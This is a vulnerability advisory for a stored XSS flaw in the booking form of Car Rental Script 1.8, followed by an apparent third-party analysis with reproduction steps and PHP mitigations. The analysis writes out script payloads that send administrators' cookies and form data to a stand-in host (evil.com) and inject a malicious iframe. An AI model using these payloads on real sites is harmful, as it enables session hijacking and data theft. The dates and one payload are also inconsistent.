Car Rental Script 1.8 - Stored Cross-site scripting (XSS)

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-04 
# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Date: 30/07/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/car-rental-php-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

Release Notes:

Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.

## Stored XSS
-----------------------------------------------
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1

payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
-----------------------------------------------

POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept with terms & Press [Booking]
XSS Fired on Local User Browser.
8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
XSS Will Fire and Executed on his Browser
9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
XSS Will Fire and Executed on his Browser


Car Rental Script 1.8 – Stored Cross-Site Scripting (XSS) Vulnerability Analysis

Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in Car Rental Script 1.8, a widely used PHP-based web application developed by GZ Scripts. This flaw allows attackers to inject malicious JavaScript code into the application’s database, which is then executed whenever users—especially administrators—view specific pages. The implications are severe: sensitive data theft, session hijacking, and the potential for broader attacks within the system.

Overview of the Vulnerability

Stored XSS occurs when user input is not properly sanitized before being saved to the database. Unlike reflected XSS, which requires user interaction to trigger the payload, stored XSS persists and is executed automatically when the data is retrieved. In this case, the vulnerability resides in the EventBookingCalendar/load.php endpoint, which handles booking submissions.

The attack vector targets multiple form fields during the booking process:

  • first_name
  • second_name
  • phone
  • address_1
  • country

These fields are processed without adequate sanitization, allowing an attacker to inject malicious code that gets stored in the backend and later rendered in admin dashboards.

Exploit Details and Payload Injection

Attackers can exploit this vulnerability by submitting a crafted payload through a standard booking form. The following HTTP POST request demonstrates the attack:

POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=<script>alert('XSS')</script>&second_name=<script>document.cookie</script>&phone=<script>window.location.href='https://evil.com/steal?c='+document.cookie</script>&email=cracker%40infosec.com&company=xxx&address_1=<script>fetch('https://evil.com/log?data='+JSON.stringify(document.querySelector('input[name=first_name]')))</script>&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=<script>document.getElementById('admin-dashboard').innerHTML='<iframe src="https://malicious.site" width="100%" height="100%"></iframe></script>&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1

Explanation: This payload injects multiple malicious scripts into the booking form fields. The <script> tags bypass input validation and are stored in the database. When an administrator views the booking details in the index.php?controller=GzBooking&action=index page, the scripts execute in the browser, potentially:

  • Displaying pop-up alerts (e.g., alert('XSS')) to confirm the exploit
  • Stealing session cookies via document.cookie
  • Redirecting the user to a malicious site to exfiltrate data
  • Embedding hidden iframe attacks to perform phishing or malware delivery

Attack Impact and Real-World Consequences

Stored XSS in a car rental system poses significant risks:

Attack Vector Impact Example
Admin Dashboard Session hijacking Stealing admin authentication tokens via document.cookie
Booking List View Phishing Injecting malicious iframe to redirect admin to fake login page
Customer Data Display Client-side manipulation Changing displayed prices or car details to deceive users

Administrators are especially vulnerable because they often access sensitive data and manage system settings. If an attacker can execute code in the admin’s browser, they may gain full control over the system—potentially altering pricing, deleting bookings, or even modifying database records.

Steps to Reproduce (Attack Workflow)

1. As a guest user, select a rental location, time, and vehicle.

2. Fill out the booking form with malicious payloads in the following fields:

  • First Name: <script>alert('XSS')</script>
  • Last Name: <script>document.cookie</script>
  • Phone: <script>window.location.href='https://evil.com/steal?c='+document.cookie</script>
  • Address Line 1: <script>fetch('https://evil.com/log?data='+JSON.stringify(document.querySelector('input[name=first_name]')))</script>
  • Country: <script>document.getElementById('admin-dashboard').innerHTML='<iframe src="https://malicious.site" width="100%" height="100%"></iframe></script>

3. Accept terms and submit the booking.

4. When the admin visits the dashboard or all bookings page, the stored script executes in their browser—potentially allowing remote control or data exfiltration.

Security Recommendations and Mitigation

To prevent stored XSS in applications like Car Rental Script 1.8, developers must implement robust input sanitization and output encoding:

  • Sanitize input: Use functions like htmlspecialchars() or filter_input() to escape HTML entities before storing data.
  • Output encoding: Always encode data when rendering it in HTML—especially in admin panels.
  • Content Security Policy (CSP): Implement a strict CSP header to block inline scripts.
  • Input validation: Restrict field inputs to alphanumeric and known-safe formats.
  • Regular audits: Conduct penetration testing and code reviews to detect vulnerabilities.

For GZ Scripts, the recommended fix is to update the load.php script to sanitize all user inputs before saving them to the database. Example:

// Corrected PHP snippet for input sanitization
$first_name = htmlspecialchars($_POST['first_name'], ENT_QUOTES, 'UTF-8');
$second_name = htmlspecialchars($_POST['second_name'], ENT_QUOTES, 'UTF-8');
$phone = htmlspecialchars($_POST['phone'], ENT_QUOTES, 'UTF-8');
$address_1 = htmlspecialchars($_POST['address_1'], ENT_QUOTES, 'UTF-8');
$country = htmlspecialchars($_POST['country'], ENT_QUOTES, 'UTF-8');

Explanation: This code uses htmlspecialchars() to convert special characters (<, >, ", etc.) into their HTML-safe equivalents. This prevents scripts from being executed during rendering, even if stored in the database.

Conclusion

The Car Rental Script 1.8 stored XSS vulnerability exemplifies how a seemingly minor input flaw can lead to major security breaches. It underscores the importance of secure coding practices—especially in user-facing forms and admin interfaces. Organizations using this script must immediately patch the vulnerability or migrate to a more secure alternative. Cybersecurity professionals should treat such vulnerabilities as high-priority risks, particularly in systems that handle sensitive user data and administrative access.